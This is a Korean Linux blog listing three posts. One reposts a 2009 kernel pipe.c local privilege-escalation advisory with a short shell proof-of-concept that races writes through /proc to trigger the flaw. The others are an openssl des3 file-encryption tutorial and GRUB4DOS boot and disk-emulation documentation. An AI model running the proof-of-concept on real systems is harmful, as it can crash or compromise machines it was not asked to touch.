'Linux'에 해당되는 글 14건

  1. 2009.11.04 Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability
  2. 2009.09.02 OpenSSL을 이용한 간단한 파일 암호화 방법
  3. 2009.07.06 GRUB for DOS boot code to MBR
2009. 11. 4. 09:57

Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability

728x90
Linux kernel is prone to a local privilege-escalation vulnerability that is caused by a NULL-pointer dereference.

Local attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.


Exploit:

The following proof of concept is available:

while : ; do
{ echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
PID=$!
OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |
{ read PID REST ; echo $PID; } )
OUT="${OUT%% *}"
DELAY=$((RANDOM * 1000 / 32768))
usleep $((DELAY * 1000 + RANDOM % 1000 ))
echo n > /proc/$OUT/fd/1 # Trigger defect
done


References:


원문 : http://www.securityfocus.com


패치코드
http://xorl.wordpress.com/2009/11/03/cve-2009-3547-linux-kernel-pipe-null-pointer-dereference-race-condition/

Trackback 1 Comment 0
2009. 9. 2. 18:14

OpenSSL을 이용한 간단한 파일 암호화 방법

728x90
Linux (리눅스) 를 사용하다 보면 간혹 파일을 암호화 해야 할 일이 있습니다. (보통 때는 거의 쓰지 않지만, 어떤 중요한 정보를 파일로 가지고 있어야 할 때는 요긴하게 쓸 수 있는 기능입니다. ^^ 윈도우에서도 이런 기능을 지원하는걸로 알지만 전 써본 일이 없습니다.)

제가 소개해 드리는 방법은 openssl 을 이용한 파일 암호화 방법 입니다.

참고 : openssl 은 인터넷에서 사용되는 보안 프로토콜인 SSL 과 TLS 를 지원하기 위하여 공개 소스로 개발된 라이브러리 및 프로그램을 말합니다. 아래는 참고 사이트 입니다. 좀 더 자세한 사항을 알고 싶으시면 클릭해 보시기 바랍니다.
1. OpenSSL 설치 확인

RedHat Linux (래드햇 리눅스) 의 경우에는 openssl이 기본적으로 설치되어 있습니다.

본인의 RedHat Linux (래드햇 리눅스) 에 OpenSSL 이 설치되어 있나 보실려면 먼저 "rpm -qa | grep openssl" 이 명령을 실행해 보시기 바랍니다. 설치되어 있는 경우에는 리스트에서 보실 수 있습니다. 만약 root 계정이 없으시면 간혹 실행이 안될때가 있는데, 이럴 경우 에는 그냥 openssl 이라고 쳐 보시기 바랍니다. 설치되어 있는 경우에는 아래와 같이 OpenSSL 이라는 프롬프트가 떨어집니다.

$ openssl
OpenSSL>

2. OpenSSL을 이용한 Encryption (암호화) 방법

이제 설치된 것을 알았으니, 해당 명령어를 이용하여 파일을 암호화 해보도록 하겠습니다.
테스트를 위해 먼저 plain.txt 라는 파일을 만드시기 바랍니다. 내용에는 그냥 Hello 라고 입력해 보시기 바랍니다.

그럼 이 파일을 암호화 해 보겠습니다.

$ openssl des3 -salt -in plain.txt -out encrypted.txt
enter des-ede3-cbc encryption password:
Verifying - enter des-ede3-cbc encryption password:


openssl 명령어를 보시면 대충 감이 오시겠지만, 간단히 설명하자면 des3 는 Encryption (암호화) 알고리즘 입니다. 이 알고리즘 외에도 여러가지가 있는데, 선택해서 쓰시면 됩니다. (제가 알기로는 AES 계열과 DES3 계열을 많이 쓰는걸로 알고 있습니다.)  "-in" 에는 암호화 하고자 하는 파일 이름을 넣으시고 "-out" 에는 암호화 된 파일 이름을 넣으시면 됩니다.

그럼 password 를 물어봅니다. 여기서 본인이 사용하고자 하는 password 를 입력하시면 됩니다. (이 password를 나중에 생각못하시면 파일을 복호화 할 수 없으니 반드시 알아 두셔야 합니다. ^^)

이렇게 하면 encrypted.txt 파일이 생깁니다. 한번 vi 로 열어 보시기 바랍니다. 암호화 되어 전혀 알아 볼 수 없다는 것을 아실 수 있습니다.

3. OpenSSL을 이용한 Decryption (복호화) 방법

이제 거꾸로 암호화된 파일을 복호화 하도록 하겠습니다.

$ openssl des3 -d -salt -in encrypted.txt -out plain2.txt
enter des-ede3-cbc decryption password:

Decryption (복호화) 명령어도 Encryption (암호화) 명령과 비슷합니다. 단순히 "-d" 옵션만 넣어주면 됩니다.

이제 plain.txt 파일과 plain2.txt 파일을 비교해 보시면 Decryption (복호화) 가 정상적으로 되었다는 것을 알 수 있습니다.

이상 "OpenSSL을 이용한 파일 Encryption (암호화) / Decryption (복호화) 방법" 이였습니다.


출처 : http://myknowledge.kr/

Trackback 0 Comment 0
2009. 7. 6. 15:41

GRUB for DOS boot code to MBR

728x90

Installation

There are many ways to install GRUB for DOS. Some of them require modifying MBR or partition boot sector, while others require changing system startup configuration files.

Install GRUB for DOS boot code to MBR

You can use bootlace.com or grubinst.exe to install GRUB for DOS boot code to MBR:

bootlace.com can be used in DOS, Windows 95/98/Me and Linux. Examples:

Install GRUB for DOS boot code to the MBR of first hard drive under DOS, Windows 95/98/Me:

   bootlace 0x80

Install GRUB for DOS boot code to the MBR of IDE channel 0, primary drive under Linux:

   bootlace /dev/hda

Install GRUB for DOS boot code to the MBR of hard drive image file aa.dsk:

   bootlace aa.dsk

grubinst.exe can be used in Linux, FreeBSD and Windows NT family OSs (Windows NT/2000/XP/2003/Vista). Examples:

Install GRUB for DOS boot code to the MBR of first hard drive under Windows NT family OSs:

   grubinst (hd0)

Install GRUB for DOS boot code to the MBR of IDE channel 0, primary drive under Linux/FreeBSD:

   grubinst "(hd0)"

You can also use device names:

   grubinst /dev/hda  (Linux)
   grubinst /dev/ad0  (FreeBSD)

Install GRUB for DOS boot code to the MBR of hard drive image file aa.dsk:

   grubinst aa.dsk

There are many options you can use with bootlace and grubinst, use the -h option to display help message.

After installing the boot code, you need to copy grldr and menu.lst to the root directory of any FAT16/FAT32/NTFS/EXT2 partition.

Install GRUB for DOS boot code to partition boot sector

You can use grubinst to install GRUB for DOS boot code to partition boot sector. Examples:

Install GRUB for DOS boot code to the first primary partition of the first hard drive:

   grubinst (hd0,0)

or

   grubinst --install-partition=0 (hd0)

or

   grubinst -p=0 (hd0)

Install GRUB for DOS boot code to the first primary partition of the hard drive image file aa.dsk:

   grubinst --install-partition=0 aa.dsk

or

   grubinst -p=0 aa.dsk

Just as in GRUB, extended partition starts with (hd0,4).

After installing the boot code, you need to copy grldr and menu.lst to the partition which you install the boot code on.

Starting GRUB for DOS from DOS

You can use load GRUB for DOS in config.sys using one of the following lines:

   DEVICE=GRUB.EXE
   INSTALL=GRUB.EXE
   SHELL=GRUB.EXE

grub.exe can also be launched from DOS prompt or batch file such as AUTOEXEC.BAT.

Starting GRUB for DOS from Linux

First, you need to apply the kexec patch to the Linux kernel.

Then, you can use the following commands to launch GRUB for DOS from linux:

   kexec -l grub.exe
   kexec -e

Booting GRUB for DOS via the Windows NT/2000/XP/2003 boot manager

Add the following line at the end of boot.ini (this file is hidden):

   C:\grldr="Start GRUB4DOS"

Then copy grldr to C:\, and create the GRUB4DOS configuration file at C:\menu.lst.

Next time you start windows, there is a new option "Start GRUB4DOS" which can be used to start GRUB for DOS.

Booting GRUB for DOS via the Windows Vista boot manager

Use bcdedit to configure the startup menu:

   bcdedit /create /d "Start GRUB4DOS" /application bootsector
   bcdedit /set {id} device boot
   bcdedit /set {id} path \grldr.mbr
   bcdedit /displayorder {id} /addlast

Then copy grldr.mbr to C:\, grldr and menu.lst to the root directory of any FAT16/FAT32/NTFS/EXT2 partition.

Note: previous version of grldr.mbr can also be used in boot.ini of Windows NT/2000/XP/2003. But it doesn't work anymore with the latest version.

Loading GRUB for DOS using other boot loader

grub.exe can be loaded as a linux kernel.

Load GRUB for DOS using GRUB or another copy of GRUB for DOS, add the following section to menu.lst:

   title Load GRUB4DOS
   kernel /grub.exe

Load GRUB for DOS using syslinux, add the following section to syslinux.cfg:

   label GRUB4DOS
           KERNEL grub.exe

Booting DOS/Windows 9X/Windows NT startup files

In GRUB for DOS, you can load the DOS/Windows 9X/Windows NT startup files directly.

DOS, Windows 95/98/Me:

   title Load io.sys
   root (hd0,0)
   chainloader (hd0,0)/io.sys

Windows NT/2000/XP/2003:

   title Load ntldr
   root (hd0,0)
   chainloader (hd0,0)/ntldr

Windows Vista:

   title Load bootmgr
   root (hd0,0)
   chainloader (hd0,0)/bootmgr


Disk emulation

In GRUB for DOS, disk emulation is implemented using the "map" command.

Direct mapping

Here is an example of mapping a image file as virtual floppy, and boot from it:

   title Boot from floppy image
   map (hd0,0)/aa.img (fd0)
   map --hook
   chainloader (fd0)+1
   rootnoverify (fd0)

map --hook is used to make the mapping created by first map command take effect immediately.

Here is an example of booting from the virtual hard disk:

   title Boot from hard disk image
   map (hd0,0)/aa.dsk (hd0)
   map (hd0) (hd1)
   map --hook
   chainloader (hd0,0)+1
   rootnoverify (hd0,0)

Map the image file as virtual hard disk, but boot from the original disk:

   title Create virtual hard disk
   map (hd0,0)/aa.dsk (hd1)
   map --hook
   chainloader (hd0,0)+1
   rootnoverify (hd0,0)

CDROM emulation is not implemented.

In direct mapping, the image file must be contiguous.

The virtual disk is implemented using INT 13. Therefore, it can be accessed in system that still uses INT 13, such as all kinds of DOS and Windows 9X (compatible mode disk access), and it can't be accessed in system that usesprotected mode drivers, such as Linux, FreeBSD and Windows NT family OSs.

Indirect mapping

Indirect mapping is very similar to direct mapping, here is an example:

   title Boot from floppy image
   map --mem (hd0,0)/aa.img (fd0)
   map --hook
   chainloader (fd0)+1
   rootnoverify (fd0)

The --mem option indicates indirect mapping.

In indirect mapping, the image file is copy to memory before the mapping is applies, therefore, the image file need not to be contiguous, however, you must have enough memory to hole the image file.

Auto MBR creation

To create virtual hard disk, you need an image file that resemble a real hard disk, which consist of MBR and partition data. If the image file only contains partition data, you need to patch it with MBR to create disk image. GRUB for DOS has taken this into consideration. When mapping disk image file, it will test the presence of MBR, if not found, it will create MBR automatically using the partition data. For example:

   title Boot from hard disk image
   map --mem (hd0,0)/aa.dsk (hd0)
   map (hd0) (hd1)
   map --hook
   chainloader (hd0,0)+1
   rootnoverify (hd0,0)

aa.dsk can be either disk image or partition image, in the later case, GRUB for DOS will create the MBR in the air.

memdisk

The indirect mapping of GRUB for DOS is similar to the function of external tool memdisk from syslinux. In fact, the following two menu entries do roughly the same thing:

   title Boot from virtual disk using internal map command
   map --mem (hd0,0)/aa.dsk (hd0)
   map (hd0) (hd1)
   map --hook
   chainloader (hd0,0)+1
   rootnoverify (hd0,0)
   title Boot from virtual disk using external memdisk
   kernel (hd0,0)/memdisk
   initrd (hd0,0)/aa.dsk

However, memdisk does not support direct mapping or auto MBR creation.


CDROM related subjects

Using ATAPI CDROM in GRUB for DOS

Use the following command to initialize ATAPI CDROM:

   cdrom --init

Then, use the following command to start using ATATPI CDROM:

   map --hook

After map --hook, the CDROM device can be accessed using (cd0), (cd1), etc.

(Note, if you need to use more than one map --hook, perhaps because you are also mapping disk images to memory, then the second and subsequent hook commands need to be map --rehook)

To boot from the first CDROM, use the following commands:

   chainloader (cd0)
   boot

To stop using CDROM:

   map --unhook
   cdrom --stop

The first command removes the (cdN) device mapping, while the second one stops the CDROM driver.

Note: If you boot GRUB for DOS from CDROM, the booting device will be (cd). This device is always accessible. However, if you want to access file from other CDROMs, you still need to initialize them using the above commands.

Examples:

To boot from the first CDROM:

   title Boot From First CDROM
   cdrom --init
   map --hook
   chainloader (cd0)
   boot

Create a bootable CDROM

In GRUB for DOS, you can use grldr to create bootable CDROM:

   mkisofs -R -b grldr -no-emul-boot -boot-load-seg 0x1000 -o bootable.iso iso_root
   mkisofs -R -b grldr -no-emul-boot -boot-load-size 4 -o grldr.iso iso_root

grldr and menu.lst should be placed at the root directory of CDROM image.

The above two commands can both create a bootable CDROM, but they are not totally the same.

The first one tells BIOS to load the whole grldr. However, some buggy BIOS might ignore it and load only a portion of the file, typically one sector (2048 bytes). This will cause the program to fail.

The second one tells BIOS to load only the first sector (2048 bytes), and the program loads the rest from CDROM. This method is safer, it should work for most BIOS.

Note: you can optionally use the -boot-info-table option, but the info table will be ignored by the program.

Load GRUB for DOS from BCDW

To load GRUB for DOS from BCDW, first copy grldr and menu.lst to the root directory of CDROM image, then add a new line to the [MenuItems] section of BCDW configuration file bcdw.ini:

   \grldr   ; Grub4Dos

Trackback 1 Comment 0